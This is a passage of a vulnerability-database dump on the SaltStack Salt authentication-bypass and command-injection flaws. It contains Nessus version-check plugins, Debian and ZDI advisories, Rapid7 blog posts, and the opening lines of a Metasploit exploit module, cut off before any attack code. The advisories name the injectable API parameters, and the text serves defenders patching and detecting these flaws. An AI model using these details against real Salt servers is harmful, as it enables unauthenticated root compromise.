value:\"2020/11/12\");\n script_set_attribute(attribute:\"generated_plugin\", 
value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-admin/salt\", unaffected:make_list(\"ge 3000.5\"), vulnerable:make_list(\"lt 3000.5\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Salt\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-21T05:01:06", "description": "This update for salt fixes the following issues :\n\n - Avoid regression on 'salt-master': set passphrase for\n salt-ssh keys to empty string (bsc#1178485)\n\n - Properly validate eauth credentials and tokens on SSH\n calls made by Salt API (bsc#1178319, bsc#1178362,\n bsc#1178361, CVE-2020-25592, CVE-2020-17490,\n CVE-2020-16846)\n\n - Fix disk.blkid to avoid unexpected keyword argument\n '__pub_user'. (bsc#1177867)\n\n - Ensure virt.update stop_on_reboot is updated with its\n default value.\n\n - Do not break package building for systemd OSes.\n\n - Drop wrong mock from chroot unit test.\n\n - Support systemd versions with dot. 
(bsc#1176294)\n\n - Fix for grains.test_core unit test.\n\n - Fix file/directory user and group ownership containing\n UTF-8 characters. (bsc#1176024)\n\n - Several changes to virtualization :\n\n - Fix virt update when cpu and memory are changed.\n\n - Memory Tuning GSoC.\n\n - Properly fix memory setting regression in virt.update.\n\n - Expose libvirt on_reboot in virt states.\n\n - Support transactional systems (MicroOS).\n\n - zypperpkg module ignores retcode 104 for search().\n (bsc#1159670)\n\n - Xen disk fixes. No longer generates volumes for Xen\n disks, but the corresponding file or block disk.\n (bsc#1175987)\n\n - Invalidate file list cache when cache file modified time\n is in the future. (bsc#1176397)\n\n - Prevent import errors when running test_btrfs unit tests\n\nThis update was imported from the SUSE:SLE-15-SP1:Update update\nproject.", "edition": 5, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-11-09T00:00:00", "title": "openSUSE Security Update : salt (openSUSE-2020-1868)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-16846", "CVE-2020-25592", "CVE-2020-17490"], "modified": "2020-11-09T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:salt", "p-cpe:/a:novell:opensuse:salt-syndic", "p-cpe:/a:novell:opensuse:salt-master", "cpe:/o:novell:opensuse:15.1", "p-cpe:/a:novell:opensuse:salt-bash-completion", "p-cpe:/a:novell:opensuse:salt-zsh-completion", "p-cpe:/a:novell:opensuse:python2-salt", "p-cpe:/a:novell:opensuse:salt-api", "p-cpe:/a:novell:opensuse:salt-fish-completion", "p-cpe:/a:novell:opensuse:salt-standalone-formulas-configuration", "p-cpe:/a:novell:opensuse:salt-ssh", "p-cpe:/a:novell:opensuse:salt-minion", "p-cpe:/a:novell:opensuse:salt-cloud", "p-cpe:/a:novell:opensuse:salt-proxy", "p-cpe:/a:novell:opensuse:python3-salt"], "id": "OPENSUSE-2020-1868.NASL", "href": "https://www.tenable.com/plugins/nessus/142620", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The 
descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-1868.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(142620);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/20\");\n\n script_cve_id(\"CVE-2020-16846\", \"CVE-2020-17490\", \"CVE-2020-25592\");\n\n script_name(english:\"openSUSE Security Update : salt (openSUSE-2020-1868)\");\n script_summary(english:\"Check for the openSUSE-2020-1868 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for salt fixes the following issues :\n\n - Avoid regression on 'salt-master': set passphrase for\n salt-ssh keys to empty string (bsc#1178485)\n\n - Properly validate eauth credentials and tokens on SSH\n calls made by Salt API (bsc#1178319, bsc#1178362,\n bsc#1178361, CVE-2020-25592, CVE-2020-17490,\n CVE-2020-16846)\n\n - Fix disk.blkid to avoid unexpected keyword argument\n '__pub_user'. (bsc#1177867)\n\n - Ensure virt.update stop_on_reboot is updated with its\n default value.\n\n - Do not break package building for systemd OSes.\n\n - Drop wrong mock from chroot unit test.\n\n - Support systemd versions with dot. (bsc#1176294)\n\n - Fix for grains.test_core unit test.\n\n - Fix file/directory user and group ownership containing\n UTF-8 characters. (bsc#1176024)\n\n - Several changes to virtualization :\n\n - Fix virt update when cpu and memory are changed.\n\n - Memory Tuning GSoC.\n\n - Properly fix memory setting regression in virt.update.\n\n - Expose libvirt on_reboot in virt states.\n\n - Support transactional systems (MicroOS).\n\n - zypperpkg module ignores retcode 104 for search().\n (bsc#1159670)\n\n - Xen disk fixes. 
No longer generates volumes for Xen\n disks, but the corresponding file or block disk.\n (bsc#1175987)\n\n - Invalidate file list cache when cache file modified time\n is in the future. (bsc#1176397)\n\n - Prevent import errors when running test_btrfs unit tests\n\nThis update was imported from the SUSE:SLE-15-SP1:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1159670\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1175987\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1176024\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1176294\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1176397\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1177867\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1178319\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1178361\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1178362\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1178485\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected salt packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", 
value:\"CVE-2020-25592\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt REST API Arbitrary Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python2-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-bash-completion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-cloud\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-fish-completion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-minion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-standalone-formulas-configuration\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-syndic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-zsh-completion\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/06\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"python2-salt-3000-lp151.5.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"python3-salt-3000-lp151.5.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-3000-lp151.5.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-api-3000-lp151.5.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-bash-completion-3000-lp151.5.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-cloud-3000-lp151.5.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-fish-completion-3000-lp151.5.30.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE15.1\", reference:\"salt-master-3000-lp151.5.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-minion-3000-lp151.5.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-proxy-3000-lp151.5.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-ssh-3000-lp151.5.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-standalone-formulas-configuration-3000-lp151.5.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-syndic-3000-lp151.5.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-zsh-completion-3000-lp151.5.30.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python2-salt / python3-salt / salt / salt-api / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2020-12-05T01:25:36", "bulletinFamily": "unix", "cvelist": ["CVE-2020-16846", "CVE-2020-25592", "CVE-2020-17490"], "description": "- -------------------------------------------------------------------------\nDebian LTS Advisory DLA-2480-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Abhijith PA\nDecember 04, 2020 https://wiki.debian.org/LTS\n- -------------------------------------------------------------------------\n\nPackage : salt\nVersion : 2016.11.2+ds-1+deb9u6\nCVE ID : CVE-2020-16846 CVE-2020-17490 CVE-2020-25592\n\nSeveral vulnerabilities were discovered in salt.\n\nCVE-2020-16846\n\n An unauthenticated user with network access to the Salt API can use\n shell injections to run code on the Salt-API using the SSH client\n\nCVE-2020-17490\n\n When using the functions create_ca, create_csr, and\n create_self_signed_cert in the tls execution module, it would not\n 
ensure the key was created with the correct permissions.\n\nCVE-2020-25592\n\n Properly validate eauth credentials and tokens along with their Access\n Control Lists \u2013 ACLs. Prior to this change, eauth was not properly\n validated when calling Salt SSH via the salt-api. Any value for \u201ceauth\u201d\n or \u201ctoken\u201d would allow a user to bypass authentication and make calls\n to Salt SSH\n\nFor Debian 9 stretch, these problems have been fixed in version\n2016.11.2+ds-1+deb9u6.\n\nWe recommend that you upgrade your salt packages.\n\nFor the detailed security status of salt please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/salt\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 1, "modified": "2020-12-04T17:34:18", "published": "2020-12-04T17:34:18", "id": "DEBIAN:DLA-2480-1:6BEB1", "href": "https://lists.debian.org/debian-lts-announce/2020/debian-lts-announce-202012/msg00007.html", "title": "[SECURITY] [DLA 2480-1] salt security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdi": [{"lastseen": "2020-11-26T01:22:25", "bulletinFamily": "info", "cvelist": ["CVE-2020-16846"], "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of SaltStack Salt. Authentication is not required to exploit this vulnerability. The specific flaw exists within the rest_cherrypy module. When parsing the ssh_options parameter, the process does not properly validate a user-supplied string before using it to execute a system call. 
An attacker can leverage this vulnerability to execute code in the context of the salt-api process.", "edition": 1, "modified": "2020-11-26T00:00:00", "published": "2020-11-24T00:00:00", "id": "ZDI-20-1381", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-1381/", "title": "SaltStack Salt rest_cherrypy ssh_options Command Injection Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-26T01:22:25", "bulletinFamily": "info", "cvelist": ["CVE-2020-16846"], "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of SaltStack Salt. Authentication is not required to exploit this vulnerability. The specific flaw exists within the rest_cherrypy module. When parsing the tgt parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the salt-api process.", "edition": 1, "modified": "2020-11-26T00:00:00", "published": "2020-11-24T00:00:00", "id": "ZDI-20-1380", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-1380/", "title": "SaltStack Salt rest_cherrypy tgt Command Injection Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-26T01:22:25", "bulletinFamily": "info", "cvelist": ["CVE-2020-16846"], "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of SaltStack Salt. Authentication is not required to exploit this vulnerability. The specific flaw exists within the rest_cherrypy module. When parsing the ssh_port parameter, the process does not properly validate a user-supplied string before using it to execute a system call. 
An attacker can leverage this vulnerability to execute code in the context of the salt-api process.", "edition": 1, "modified": "2020-11-26T00:00:00", "published": "2020-11-24T00:00:00", "id": "ZDI-20-1382", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-1382/", "title": "SaltStack Salt rest_cherrypy ssh_port Command Injection Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-26T01:22:25", "bulletinFamily": "info", "cvelist": ["CVE-2020-16846"], "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of SaltStack Salt. Authentication is not required to exploit this vulnerability. The specific flaw exists within the rest_cherrypy module. When parsing the ssh_remote_port_forwards parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the salt-api process.", "edition": 1, "modified": "2020-11-26T00:00:00", "published": "2020-11-24T00:00:00", "id": "ZDI-20-1383", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-1383/", "title": "SaltStack Salt rest_cherrypy ssh_remote_port_forwards Command Injection Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-26T01:22:25", "bulletinFamily": "info", "cvelist": ["CVE-2020-16846"], "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of SaltStack Salt. Authentication is not required to exploit this vulnerability. The specific flaw exists within the rest_cherrypy module. When parsing the ssh_priv parameter, the process does not properly validate a user-supplied string before using it to execute a system call. 
An attacker can leverage this vulnerability to execute code in the context of the salt-api process.", "edition": 1, "modified": "2020-11-26T00:00:00", "published": "2020-11-24T00:00:00", "id": "ZDI-20-1379", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-1379/", "title": "SaltStack Salt rest_cherrypy ssh_priv Command Injection Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2020-11-13T20:46:22", "bulletinFamily": "info", "cvelist": ["CVE-2020-16846", "CVE-2020-25213", "CVE-2020-25592", "CVE-2020-7384"], "description": "## SaltStack RCE\n\n\n\n[wvu-r7](<https://github.com/wvu-r7>) added an exploit [module](<https://github.com/rapid7/metasploit-framework/pull/14379>) that targets SaltStack\u2019s Salt software. Specifically, the module exploits both an authentication bypass (CVE-2020-25592) and a command injection vulnerability (CVE-2020-16846) in SaltStack\u2019s REST API to get code execution as `root` through Salt\u2019s SSH client on infected versions. You can read more about the vulns [on AttackerKB](<https://attackerkb.com/topics/TCY0EUyJIW/cve-2020-25592-saltstack-authentication-bypass-and-salt-ssh-command-execution?referrer=wrapup#rapid7-analysis>).\n\n## Hack Metasploit with Metasploit\n\n[justinsteven](<https://github.com/justinsteven>) both discovered a vulnerability (CVE-2020-7384) in and added an exploit [module](<https://github.com/rapid7/metasploit-framework/pull/14331>) for Metasploit\u2019s `msfvenom` utility. `msfvenom` allows users to use custom apk templates to inject a payload into; however, `msfvenom` does not sanitize certain fields, such as the `Owner` field, that get passed into a `Open3.popen3()` call. Because of this, an unsuspecting user of `msfvenom` might use a malicious template and subsequently give an attacker a shell on the user\u2019s computer. 
This issue has been fixed in Metasploit\u2019s `6.0.12` release and Metasploit Pro\u2019s `4.19.0` release.\n\n## Wordpress File Manager RCE\n\n[ide0x90](<https://github.com/ide0x90>) added an exploit [module](<https://github.com/rapid7/metasploit-framework/pull/14253>) that targets various versions of a popular Wordpress plugin, `Wordpress File Manager`. The vulnerability (CVE-2020-25213) is due to a leftover example file that enables unauthenticated execution of a set of commands. One of those commands is an `upload` command, which makes uploading a php webshell and getting code execution effortless.\n\n## Apache Zookeeper Info Disclosure\n\n[juushya](<https://github.com/juushya>) added an auxiliary [module](<https://github.com/rapid7/metasploit-framework/pull/14269>) that obtains useful information such as IPs of connected clients, server OS information and statistics, and log files from Apache Zookeeper instances.\n\n## New modules (4)\n\n * [SaltStack Salt REST API Arbitrary Command Execution](<https://github.com/rapid7/metasploit-framework/pull/14379>) by wvu and KPC, which exploits [CVE-2020-16846](<https://attackerkb.com/topics/FrF3udya6o/cve-2020-16846-saltstack-unauthenticated-shell-injection?referrer=wrapup#rapid7-analysis>) and [CVE-2020-25592](<https://attackerkb.com/topics/TCY0EUyJIW/cve-2020-25592-saltstack-authentication-bypass-and-salt-ssh-command-execution>)\n * [WordPress File Manager Unauthenticated Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/14253>) by Alex Souza (w4fz5uck5) and Imran E. 
Dawoodjee, which exploits [CVE-2020-25213](<https://attackerkb.com/topics/biVgLIkiSE/cve-2020-25213>)\n * [Rapid7 Metasploit Framework msfvenom APK Template Command Injection](<https://github.com/rapid7/metasploit-framework/pull/14331>) by Justin Steven, which exploits [CVE-2020-7384](<https://attackerkb.com/topics/MmrdI6rWUn/cve-2020-7384>)\n * [Apache ZooKeeper Information Disclosure](<https://github.com/rapid7/metasploit-framework/pull/14269>) by Karn Ganeshen\n\n## Enhancements and features\n\n * PR [#14387](<https://github.com/rapid7/metasploit-framework/pull/14387>) by [adfoster-r7](<https://github.com/adfoster-r7>) added a check to ensure that uses of `AutoCheck` are always prepended as opposed to included in modules.\n * PR [#14373](<https://github.com/rapid7/metasploit-framework/pull/14373>) by [dwelch-r7](<https://github.com/dwelch-r7>) removed the unused Netware console session type from Framework.\n * PR [#14371](<https://github.com/rapid7/metasploit-framework/pull/14371>) by [h00die](<https://github.com/h00die>) added vulnerable version information to the `auxiliary/scanner/http/drupal_views_user_enum` module.\n * PR [#14353](<https://github.com/rapid7/metasploit-framework/pull/14353>) by [agalway-r7](<https://github.com/agalway-r7>) modified the `msfdb` command to show more readable and informative output to the user.\n\n## Bugs fixed\n\n * PR [#14304](<https://github.com/rapid7/metasploit-framework/pull/14304>) by [b4rtik](<https://github.com/b4rtik>) updated the `post/windows/manage/execute_dotnet_assembly` module to be able to handle additional function signatures of the code that will be injected into.\n * PR [#14382](<https://github.com/rapid7/metasploit-framework/pull/14382>) from [h00die](<https://github.com/h00die>) fixed a crash in the `auxiliary/analyze/apply_pot` module caused by an out-of-date symbol name.\n * PR [#14378](<https://github.com/rapid7/metasploit-framework/pull/14378>) by [adfoster-r7](<https://github.com/adfoster-r7>) added 
proper synchronization to the job status tracker that is used by Metasploit\u2019s RPC service.\n * PR [#14370](<https://github.com/rapid7/metasploit-framework/pull/14370>) by [cgranleese-r7](<https://github.com/cgranleese-r7>) fixed a crash in `msfconsole`\u2019s `generate` command caused by attempting to tab complete input with no results.\n * PR [#14363](<https://github.com/rapid7/metasploit-framework/pull/14363>) by [zeroSteiner](<https://github.com/zeroSteiner>) fixed an issue in the `auxiliary/scanner/smb/smb_login` module that reported false negatives for valid credentials when `msfconsole` was started with `bundle exec` preceding the command.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.15...6.0.16](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-11-05T10%3A12%3A21-06%3A00..2020-11-12T16%3A18%3A40%2B00%3A00%22>)\n * [Full diff 6.0.15...6.0.16](<https://github.com/rapid7/metasploit-framework/compare/6.0.15...6.0.16>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "modified": "2020-11-13T19:08:01", "published": "2020-11-13T19:08:01", "id": "RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7", "href": "https://blog.rapid7.com/2020/11/13/metasploit-wrap-up-87/", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-10T14:46:17", "bulletinFamily": "info", "cvelist": ["CVE-2020-11651", "CVE-2020-16846", "CVE-2020-25592"], "description": "## What\u2019s up?\n\n\n\nWe start the November critical vulnerability season with a pair of CVEs\u2014[CVE-2020-16846](<https://attackerkb.com/topics/FrF3udya6o/cve-2020-16846-saltstack-unauthenticated-shell-injection>) and [CVE-2020-25592](<https://attackerkb.com/topics/TCY0EUyJIW/cve-2020-25592-saltstack-authentication-bypass-and-salt-ssh-command-execution>)\u2014that, when combined, can result in unauthenticated remote root access on a target system. SaltStack developers [disclosed these weaknesses on Nov. 3, 2020](<https://www.saltstack.com/blog/on-november-3-2020-saltstack-publicly-disclosed-three-new-cves/>) and have [released patches](<https://gitlab.com/saltstack/open/salt-patches>) for these weaknesses.\n\nBefore reading on, Rapid7 advises all SaltStack users to patch their systems as quickly as possible. If at all possible, **please don\u2019t wait for your typical patch cycle to apply SaltStack security updates.** There are no known mitigations or workarounds as of Nov. 9, 2020. 
As noted in the aforelinked AttackerKB Rapid7 analysis: _\u201cPre-authenticated remote root is the gold-medal standard for attackers, and it took Rapid7 researchers all of 15 minutes and a single HTTP request to get there.\u201d_\n\n## SaltStack vulnerability information, exposure details, and attacker activity\n\nSaltStack developers noted that the following versions are affected:\n\n * 3002\n * 3001.1, 3001.2\n * 3000.3, 3000.4\n * 2019.2.5, 2019.2.6\n * 2018.3.5\n * 2017.7.4, 2017.7.8\n * 2016.11.3, 2016.11.6, 2016.11.10\n * 2016.3.4, 2016.3.6, 2016.3.8\n * 2015.8.10, 2015.8.13\n\nWhile none of the CVEs have a rating (yet), these combined weaknesses are trivial to exploit and result in complete system compromise, which will happen, since [CVE-2020-11651](<https://attackerkb.com/topics/rEVl04z1p0/cve-2020-11651>), another SaltStack vulnerability from April 2020, was exploited quickly by threat actors. We fully expect CVEs 2020-16846 and 2020-25592 to follow that same path.\n\n\n\n[Rapid7 Labs](<https://www.rapid7.com/research/project-sonar/>) thankfully only discovered 215 vulnerable SaltStack servers in November 2020 scans, but that doesn\u2019t mean your internal SaltStack nodes will not be identified and compromised by attackers who gain footholds as a result of [phishing attacks](<https://www.rapid7.com/fundamentals/phishing-attacks/>).\n\nThere are no mitigations for these vulnerabilities. You must patch your systems to be safe. As of Nov. 9, 2020, Rapid7 Labs[ Project Heisenberg](<https://www.rapid7.com/research/project-heisenberg/>), our global honeypot network, did not detect any malicious SaltStack activity, but that will likely change very quickly.\n\n## Final guidance\n\nAlong with patching, organizations should monitor SaltStack API logs very closely for anomalous activity going back to at least Nov. 
3, 2020 and until/after affected SaltStack systems are patched.\n\nGiven that there have been two severe SaltStack weakness episodes in one calendar year, Rapid7 further suggests organizations increase monitoring for anomalies in general on SaltStack systems and stay on top of vulnerability announcements from the SaltStack developers.\n\n#### Vulnerable to CVE-2020-16846 and CVE-2020-25592? Scan Your Environment Today to Find Out.\n\n[Get Started](<https://www.rapid7.com/trial/insightvm>)", "modified": "2020-11-10T14:22:33", "published": "2020-11-10T14:22:33", "id": "RAPID7BLOG:54F1D96262CFC427DBA32564C2E47A77", "href": "https://blog.rapid7.com/2020/11/10/saltstack-pre-authenticated-remote-root-cve-2020-16846-and-cve-2020-25592-what-you-need-to-know/", "type": "rapid7blog", "title": "SaltStack Pre-Authenticated Remote Root (CVE-2020-16846 and CVE-2020-25592): What You Need to Know", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-11-12T16:07:53", "description": "", "published": "2020-11-12T00:00:00", "type": "packetstorm", "title": "SaltStack Salt REST API Arbitrary Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-16846", "CVE-2020-25592"], "modified": "2020-11-12T00:00:00", "id": "PACKETSTORM:160039", "href": "https://packetstormsecurity.com/files/160039/SaltStack-Salt-REST-API-Arbitrary-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'SaltStack Salt REST API Arbitrary Command Execution', \n'Description' => %q{ \nThis module exploits an authentication 